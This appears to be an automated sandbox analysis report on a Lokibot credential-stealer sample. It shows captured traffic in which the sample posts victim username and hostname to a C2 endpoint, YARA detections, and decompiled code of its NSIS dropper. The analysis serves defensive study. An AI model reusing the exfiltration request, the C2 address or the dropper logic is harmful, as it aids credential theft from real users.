                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gxrVYDOVXCBXXewOH%2FJU78gmxBsZecNbyMCnQdhrynqYFCdLKoi%2BShuwRk3Wm6%2FFRdZt4dRQp2jPFEqfRpnLiPRvSx4RTqGet2X%2FOMvn5mcIBV960f5eIbfgCr3beNWQckv5%2F3qaZ1oRCAtM9L4XUXoBg8vx1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec21c7f1e6964-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.649788172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:31.397798061 CEST1072OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:31.413613081 CEST1072OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:31.565464973 CEST1073INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xk4891DLaBXXjT1FhSY5vGjPMlx7%2FPwKsYbmlt3n3G5MwqOiF37%2FMqhNAZ9k%2FwEIMsJstsiC5k0UvsMw0imxbeYrZlZTQ1lGsg9Eox%2BRhZh7Mbe51awkrb53qeX5Jtjag4OXYQUnQ2SLmWUAhH7J7El0v%2F1uGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf804c5d4eb0-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: aZOmps0Ug8.exe PID: 6780 Parent PID: 5632

                      General

                      Start time:08:28:10
                      Start date:14/10/2021
                      Path:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                      Imagebase:0x400000
                      File size:283552 bytes
                      MD5 hash:70D177ABC7455C709AE9710630B9EA49
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Chronological Activities

                      Analysis Process: aZOmps0Ug8.exe PID: 3980 Parent PID: 6780

                      General

                      Start time:08:28:12
                      Start date:14/10/2021
                      Path:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                      Imagebase:0x400000
                      File size:283552 bytes
                      MD5 hash:70D177ABC7455C709AE9710630B9EA49
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: aZOmps0Ug8.exe PID: 6780 Parent PID: 5632 aZOmps0Ug8.exeCOMMON

                        Executed Functions

                        Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116); // executed
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\engineer\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x571700
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\engineer\\Desktop\\aZOmps0Ug8.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x571700
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("ncjucqtyih Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\engineer\\Desktop\\aZOmps0Ug8.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\engineer\\Desktop\\aZOmps0Ug8.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                        0x0040310c
                        0x00403110
                        0x00403118
                        0x0040311c
                        0x00403121
                        0x00403131
                        0x00403134
                        0x0040313b
                        0x00403142
                        0x00403142
                        0x0040313b
                        0x00403144
                        0x00403144
                        0x0040325a
                        0x0040325a
                        0x0040325a
                        0x0040325c
                        0x0040325e
                        0x00000000
                        0x00000000
                        0x004031f3
                        0x004031f6
                        0x004031fe
                        0x004031fe
                        0x00403201
                        0x00403206
                        0x00403208
                        0x00403208
                        0x00403209
                        0x00403209
                        0x0040320e
                        0x00403211
                        0x0040324a
                        0x0040324f
                        0x00403254
                        0x00403257
                        0x00403259
                        0x00403259
                        0x00403259
                        0x00000000
                        0x00403213
                        0x00403213
                        0x00403214
                        0x00403217
                        0x0040321f
                        0x00403222
                        0x00403224
                        0x00403224
                        0x00403224
                        0x00403224
                        0x00403222
                        0x00403229
                        0x0040322f
                        0x00403237
                        0x0040323a
                        0x0040323c
                        0x0040323c
                        0x0040323c
                        0x0040323c
                        0x0040323a
                        0x00403241
                        0x00403248
                        0x00403262
                        0x00403265
                        0x00403265
                        0x0040326e
                        0x00403273
                        0x00403273
                        0x0040327e
                        0x00403284
                        0x00403289
                        0x0040328b
                        0x004032b1
                        0x004032b6
                        0x004032c0
                        0x004032c7
                        0x004032cb
                        0x00403332
                        0x00403332
                        0x00403337
                        0x0040333d
                        0x00403341
                        0x00403456
                        0x0040345c
                        0x004034f9
                        0x004034f9
                        0x004034fe
                        0x00403501
                        0x00403503
                        0x00403503
                        0x0040350b
                        0x0040350b
                        0x0040346b
                        0x00403474
                        0x00403476
                        0x0040347b
                        0x0040347d
                        0x0040347f
                        0x00403481
                        0x00403483
                        0x00403485
                        0x00403487
                        0x00403497
                        0x00403499
                        0x0040349b
                        0x004034a8
                        0x004034b7
                        0x004034bf
                        0x004034c7
                        0x004034c7
                        0x0040349b
                        0x00403487
                        0x00403483
                        0x004034cb
                        0x004034d0
                        0x004034d7
                        0x004034e5
                        0x004034e8
                        0x004034ee
                        0x004034f0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004034d9
                        0x004034df
                        0x004034e1
                        0x004034e3
                        0x004034f2
                        0x004034f4
                        0x00000000
                        0x004034f4
                        0x00000000
                        0x004034e3
                        0x004034d7
                        0x00403350
                        0x00403357
                        0x00403357
                        0x004032cd
                        0x004032d3
                        0x00403322
                        0x00403322
                        0x0040332e
                        0x00000000
                        0x0040332e
                        0x004032dc
                        0x004032e9
                        0x004032e0
                        0x004032e6
                        0x00000000
                        0x00000000
                        0x004032e8
                        0x004032e8
                        0x004032e8
                        0x004032ed
                        0x004032ef
                        0x004032f7
                        0x00403368
                        0x0040336a
                        0x00403371
                        0x00403379
                        0x00403379
                        0x00403384
                        0x00403389
                        0x00403398
                        0x0040339c
                        0x0040339d
                        0x004033a6
                        0x0040339f
                        0x0040339f
                        0x0040339f
                        0x004033ac
                        0x004033b2
                        0x004033b8
                        0x004033c0
                        0x004033c0
                        0x004033ce
                        0x004033d5
                        0x004033de
                        0x004033e4
                        0x004033e4
                        0x004033f0
                        0x004033f6
                        0x00403400
                        0x0040340a
                        0x00403410
                        0x00403412
                        0x00403414
                        0x00403415
                        0x00403416
                        0x0040341b
                        0x00403427
                        0x0040342d
                        0x00403434
                        0x00403437
                        0x0040343d
                        0x0040343d
                        0x00403434
                        0x00403412
                        0x00403441
                        0x00403447
                        0x00403447
                        0x00403447
                        0x0040344a
                        0x0040344b
                        0x0040344c
                        0x0040344c
                        0x00000000
                        0x00403398
                        0x004032f9
                        0x004032fb
                        0x00403306
                        0x00000000
                        0x00000000
                        0x0040330e
                        0x00403319
                        0x0040331e
                        0x00000000
                        0x0040331e
                        0x00403293
                        0x0040329f
                        0x004032a4
                        0x004032a9
                        0x004032ab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403248
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004031f8
                        0x004031f8
                        0x004031f8
                        0x004031f9
                        0x004031f9
                        0x00000000
                        0x004031f8
                        0x00000000
                        0x00403149
                        0x0040314a
                        0x00403156
                        0x0040315c
                        0x00000000
                        0x0040315e
                        0x00403160
                        0x00403167
                        0x0040316c
                        0x00403171
                        0x00403178
                        0x0040317e
                        0x00403194
                        0x004031a4
                        0x004031a9
                        0x004031af
                        0x004031b6
                        0x004031c9
                        0x004031ce
                        0x004031d0
                        0x004031d2
                        0x004031d7
                        0x004031d7
                        0x004031e7
                        0x004031ed
                        0x00000000
                        0x004031ed

                        APIs
                        • SetErrorMode.KERNELBASE ref: 00403121
                        • GetVersion.KERNEL32 ref: 00403127
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                        • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                        • OleInitialize.OLE32(00000000), ref: 00403178
                        • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                        • GetCommandLineA.KERNEL32(ncjucqtyih Setup,NSIS Error), ref: 004031A9
                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00000000), ref: 004031BC
                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00409168), ref: 004031E7
                        • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                        • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                        • OleUninitialize.OLE32(00000020), ref: 00403337
                        • ExitProcess.KERNEL32 ref: 00403357
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00000000,00000020), ref: 0040336A
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00000000,00000020), ref: 00403379
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00000000,00000020), ref: 00403384
                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,00000000,00000020), ref: 00403390
                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                        • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\aZOmps0Ug8.exe,0041F0F0,00000001), ref: 0040340A
                        • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                        • ExitProcess.KERNEL32 ref: 0040350B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\aZOmps0Ug8.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\aZOmps0Ug8.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$ncjucqtyih Setup$~nsu
                        • API String ID: 3469842172-790891428
                        • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                        • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                        • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                        • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
